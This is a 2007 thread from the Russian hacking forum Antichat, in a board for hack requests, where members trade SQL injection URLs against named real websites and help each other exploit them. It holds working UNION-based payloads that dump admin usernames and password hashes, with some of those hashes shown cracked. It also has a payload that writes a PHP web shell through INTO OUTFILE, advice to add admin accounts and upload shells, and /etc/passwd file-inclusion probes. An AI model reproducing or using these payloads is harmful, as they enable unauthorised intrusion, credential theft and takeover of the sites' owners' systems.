Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Просьбы о взломах (https://forum.antichat.xyz/forumdisplay.php?f=44)
-   -   Помощь Sql Иньекции. (https://forum.antichat.xyz/showthread.php?t=36161)

guest3297 27.03.2007 22:12

Помощь Sql Иньекции.
 
Если вы хотите что бы вам быстро оказали помощь оставляте ссыки на предпологаемые вами sql иньекции.

Здесь оставляем ссылки вида.

PHP код:

http://site.ru/index.php?id=[sql] 

Все остальные ссылки рассматривать не будут.

Thanat0z 27.03.2007 22:44

ссыки? Блин, Кэш, глаза чуть не сломал пока читал месадж, исправь ошибки, не в обиду

ЗЫ

__http://prod1.cmj.com/articles/display_article.php?id=6547215'


16 колонок, вывод не осилил

Ошибки разные, отсюда делаю вывод что юнион должен работать, иначе бы типы данных игнорились:
Код:

__http://prod1.cmj.com/articles/display_article.php?id=-6547215'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Implicit conversion from datatype 'VARCHAR' to 'INT' is not allowed. Use the CONVERT function to run this query

__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,nulll--
Invalid column name 'nulll'=====================================================================:::

__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
Column of type (BIT) does not allow nulls. It may not be compared with null

__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,0,null,null,null,null,null--
Implicit conversion from datatype 'VARCHAR' to 'INT' is not allowed. Use the CONVERT function to run this query


guest3297 27.03.2007 23:07

Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке.

Thanat0z 28.03.2007 01:42

Цитата:

Сообщение от [ cash ]
Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке.

нужно использовать convert/aes_decrypt?

guest3297 28.03.2007 12:10

cast(TABLE as nvarchar)
cast(TABLE as int)

Alexsize 28.03.2007 15:09

http://forum.pacan.net/kb.php?mode=cat&cat=23'

Не могу добраться до хэшей админа. Пхпбб.

[x26]VOLAND 31.03.2007 21:17

Помогите заюзать найденный SQL-inj
 
http://portal.migtel.ru/modules.php?name=Search
Если в поле поиска забито что-товроде 99' скрипт выдаёт явную ошибку. Из префиксов видно что cms - Nuke.
Помогите составить запрос для вытаскивания хэша админа.

Doom123 08.04.2007 15:47

а теперь признайтесь ктио туда троянца залил

AkyHa_MaTaTa 10.04.2007 16:40

офтоп
Тоже вот не хотелось новую тему создавать.
офтоп
На счет MSSQL, делаю такой вот запросик : ' UNION SELECT TOP 1 TABLE_NAME FROM users (post запросе) дайет вот такой ответ:Microsoft JET Database Engine ошибка '80040e14'.
В таслицах или запрофах, высранных в запрофе на осъединение, не фовпадает чифло фтолсцов
(повторил слово в слово!). Ну короче неправельно выбрано кол. столбцов, насколько я понял из
MS.Press.MCAD.MCSE.MCDB - TOPом и задается кол. столбцов,тока сколька не cтавил TOP, все равно ему мало:),короче не правильный запросик, подскажите че нибудь.
Да насчет INFORMATION_SCHEMA.TABLES в запросе - говорит что "таблицы таблиц" нету.

Spyder 10.04.2007 17:19

Цитата:

В таслицах или запрофах, высранных в запрофе на осъединение, не фовпадает чифло фтолсцов
жесть :D :D :D :D
Цитата:

На счет MSSQL, делаю такой вот запросик : ' UNION SELECT TOP 1 TABLE_NAME FROM users
0_о в MSSQL нет оператора UNION

guest3297 10.04.2007 17:38

Spyder
Цитата:

0_о в MSSQL нет оператора UNION
Бред есть.

AkyHa_MaTaTa
JET Database работает на драйверах. SQL INJ ты тут не проведешь.

AkyHa_MaTaTa 10.04.2007 17:49

Цитата:

Сообщение от Spyder
жесть :D :D :D :D

да я сам долго смеялся:)
Цитата:

Сообщение от Spyder
0_о в MSSQL нет оператора UNION

Может я в чем то и ощибаюсь, but:

in first: Если бы не было такого оператора MSиха послала бы куда подальше.

in second: Загляни вот сюда:http://injection.rulezz.ru/MSSQL-ASP-Injection.html

and last: почитай ман от мелкомягких: MS.Press.MCAD.MCSE.MCDB(правда на инглише).

Rebel 11.04.2007 00:39

Извините за оффтопик. Но если на сайте с дырой включен MagicQuotes? Как же тогда шелл залить, into outfile ведь не работает.. А етс/пассвд безполезно расшифровывать, пароли сложные..

p-range 11.04.2007 11:46

Цитата:

А етс/пассвд безполезно расшифровывать, пароли сложные..
там нет паролей

ShadOS 11.04.2007 12:22

Цитата:

Сообщение от p-range
там нет паролей

А вот и не прав. В Linux на основе ядер 2.2.x и более ранних они хранились в /etc/passwd, а файла /etc/shadow ещё не было. Хотя сейчас такие встретить очень сложно. Да и алгоритм шифрования там не такой уж и надёжный =)))

AkyHa_MaTaTa 11.04.2007 17:51

Помощь Sql Иньекции.
 
http://rabota.crimea.ua/agency.php?id=-1%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,VERSION()/*
дальше чето не выходит:)(опыта маловата), там еще magic
включено

InferNo23 11.04.2007 17:57

http://rabota.crimea.ua/agency.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat(username,0x3a,password)+fro m+forum_user/*

admin:f4773bcafa963af10487caa726a47458:xm|

md5 с солью

AkyHa_MaTaTa 11.04.2007 18:01

2InferNo23 - спасибоо!!! +
Там на форуме вобла 3.6.5 вроде стоит.
Может я немного в танке: xm| - salt, или это просто хm|
если просто xm, то можна ли из скуля достать salt?
Неохота зря брутить:) если xm| не salt.
Еще раз пасибо.

AkyHa_MaTaTa 11.04.2007 19:12

да я таки в танке:):http://rabota.crimea.ua/agency.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 %20,16,17,18,19,20,concat(username,0x3a,password,0 x3a,salt)+from+forum_user/*

Rebel 11.04.2007 22:04

Неа... Должны быть.. Там 9 хэшей есть. А шадов вообще нету похоже. Там OpenBSD стоит, шифромание Blowfish. Мне хотя бы скрипты посмотреть, но пути на сайте типа сайт/search/ или сайт/news/ Не понятно, что там Index.php не подходит и html тоже и просто search.php и news.php... Знать бы куда там апач установлен, может файл конфигурации подсмотреть тогда получится... Может кто посоветует, какие важные файлы можно еще почитать там..

Lancellot 12.04.2007 18:58

Здраствуйте!
Да бы не создавать новую тему ..задам вопрос тут))
Столкнулся с проведением скуль инькции в PostgreSQL
Есть маса вопросов...прочитал статью Spyder'a и остались непонятные нюансы!
Короче подобрал столбцы
Код:

null,null...
при подстановке числа появляется чистый
экран и на месте наверное где должно быть число видно только(.....)-троеточие!Так же само и с выводом таблиц ...они выводятся только ввиде (....) как сделать чтобы их было видно????
Извиняюсь за может не корректный вопросенг но очень надо спс за ранее !=))
Может функциею to_char(числа) только не пойму как?

guest3297 12.04.2007 19:38

Цитата:

прочитал статью Spyder'a
Неудивительно.
url дай.

L0rd_Ha0S 12.04.2007 20:08

To ShadOS
Цитата:

В Linux на основе ядер 2.2.x и более ранних они хранились в /etc/passwd, а файла /etc/shadow ещё не было. Хотя сейчас такие встретить очень сложно. Да и алгоритм шифрования там не такой уж и надёжный =)))
Они и сейчас там могут храниться, даже с ядром 2.6.x
Код:

/sbin/shadowconfig on | off
;)

Lancellot 12.04.2007 20:11

Url не дам бикоз на очень популярном сайте=))
Пока нехочу палится и всетаки можно что нить зделать с этим???

Lancellot 12.04.2007 20:20

Ну лан здесь мне ничего не должен ))
Ну хотябы к примеру можно было сказать что да как =\

Lancellot 12.04.2007 20:26

Так я читал ...хоть скажите можно то эти таблицы на экран вывести?

Rebel 13.04.2007 01:05

У меня тогда еще один маленький вопрос по поводу SQLInjection:
Есть скрипт, которому передается параметр - имя php-файла, которое берется из директории на сайте: site.ru/dir/
Можно ли как-то запустить с помощью этого удаленный сценарий? При том, что magic quotes включены и залить в эту самую директорию, как и в любую другую ничего нельзя...

n1†R0x 13.04.2007 08:43

Цитата:

Сообщение от neval
http://cards.tut.by/holidays.php?event=-

немного не там, но:
Код:

http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,6/*&m=4
это вывод

Код:

http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,6+from+admins/*&m=4
подобрал таблицу 'admins'

Код:

http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,concat(login,0x3a,password)+from+admins/*&m=4
логин:пасс одного из админов
остальных перебираем лимитом
Код:

http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,concat(login,0x3a,password)+from+admins+limit+0,1/*&m=4
Цитата:

alesya:5aa0fa5819ba07df
vitovt:2e782c85379a326e
zettich:773359240eb9a1d9
mysql4-hash, перебор passwordspro или другими тулзами, удачи.

админка: _http://cards.tut.by/admin/login.php

//upd:
2e782c85379a326e = 12345
773359240eb9a1d9 = 123
нужно расшифровать #1 (:

p-range 13.04.2007 09:43

только не пойму причем тут sql-injection... похоже на php-include, хотя...
ты порбовал подставлять вместо этих значений левые?
например:
Цитата:

?page=/etc/passwd
?page=/etc/passwd%00
и т.д.
а вообще учи php и читай https://forum.antichat.ru/thread6296.html

Spyder 13.04.2007 10:05

2 Lancellot, скинь ссылку мне в ПМ или в аську постучи =\

gibson 14.04.2007 19:16

Цитата:

нужно расшифровать #1 (:
Зачем? можно просто добавить пользователя к хосту и все!
zettich|123 добавить админа
vitovt|12345 админ на форуме http://forums.tut.by
можно залить шелл через форум и все! А того удалить.
Сорри за оффтоп

}{0TT@БЬ)Ч 14.04.2007 19:40

извинити за оффтоп но не понятно для чего сделана тема ведь в Sql Инъекции происходит тоже самое?

Doom123 15.04.2007 23:53

http://israblog.nana.co.il/blogread.asp?blog=-1'gh читал дето что еси возрощяет пустую страницу это может означать что скл иньекция там есть... как вы думаете есть там чтото или нет?

Joker-jar 16.04.2007 03:04

Помогите найти скулю http://rudtp.ru/icc.php?id=1'

wizmo 16.04.2007 19:42

Help!
Есть инекция
Код HTML:

http://anime.megalan.ru/lite/index.php?cat=animation&mode=show_anime&id=-1+union+select+name,pass,2,2,3,4,5,6,7,8,4,2,6,7,9,1,2,3 from users
Как записать в таблицу users, в поле name
Код HTML:

<? system($_GET['cmd'])?>
И еще. Вот так не прокатывает. На сервере magic_ковычки=on
Код:

http://anime.megalan.ru/lite/index.php?cat=animation&mode=show_anime&id=-1+union+select+char(60,63,32,115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,32,63,62),1,2,2,3,4,5,6,7,8,4,2,6,7,9,1,2,3+into+outfile+char(47,104,111,109,101,47,49,46,112,104,112)
Непрокатывает последний char().

SkyMan 16.04.2007 20:45

Цитата:

Как записать в таблицу users, в поле name
http://anime.megalan.ru/lite/index.php?cat=animation&mode=show_anime&id=-1;insert into news (bla-bla-bla, ..., name, ..., bla-bla-bla) values('bla-bla-bla',...,'<? system($_GET["cmd"])?>', ..., 'bla-bla-bla');

Попробуй.

Цитата:

Непрокатывает последний char().
В папку должна быть запись разрешена.

wizmo 16.04.2007 21:06

Доступ к папке здесь непричем. Тока что прочитал гдето что select "чтото" into outfile char("чтото") не прокатит. Типа особенность этой конструкции. Обязательно into outfile '/home/shell.php'. Без ковычек здесь не обойдешся... ((

guest3297 16.04.2007 21:31

wizmo
http://forum.antichat.ru/threadnav34338-1-10.html

MegaDeth 20.04.2007 21:02

http://www.nix.ru/dealers/howtofindus.html?key=1'+UNION+SELECT+1,1,1,3,3,3,3 ,3,3,3,3/*

обтрахался. как залить шелл? на форуме пасс от админа раскриптовал, хотя доступ к админке закрыт htaccess ом. нарыл в базе многа инфы.. безполезной.
*база с форумом phpbb2 если что, префикс phpbb_

guest3297 20.04.2007 21:37

версия mysql 5
Цитата:

COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
TFDt_Lists_ext
Templates
Templates_Groups
adv_excludes
adv_nelikv_headers
advert_nel_prop
advert_nelikv
advert_nelikv_temp2
advert_nelikv_temp_s
advert_nelikv_temp_t
answers
articles
articles1
arttokens
assemblies_components
bad_dealers
banners
chapter_to_theme
chapter_to_theme1
chapters
chapters1
city_list
compare_table_item
compare_table_property
compare_table_values
conf_params
configurations2
context_search
contragent_properties
contragents
contragents_exchange_rates
contragents_parameters
contragents_pricing
contragents_properties
contragents_properties_default
contragents_rests
contragents_sets_default
correlations
csg_groups
current
cut_name_exc
dealer_names_pass
dealer_pass
dealers_data
dealers_data_temp
dealers_price_data
desc_goods_pictures
desc_groups
desc_pictures
disallowing_words
disallowing_words_1
download_servers
driver
driver_forum_links
driver_good
driver_group
driver_group_vendor
driver_os
driver_vendor
driver_vendor_urls
drivers_hp_section_links
drivers_request_questions
drivers_supported_groups
drvtokens
drvtokens_old
enum_data_types
enum_elements
faq_category
faq_hotlist
faq_obligatory


Время: 16:50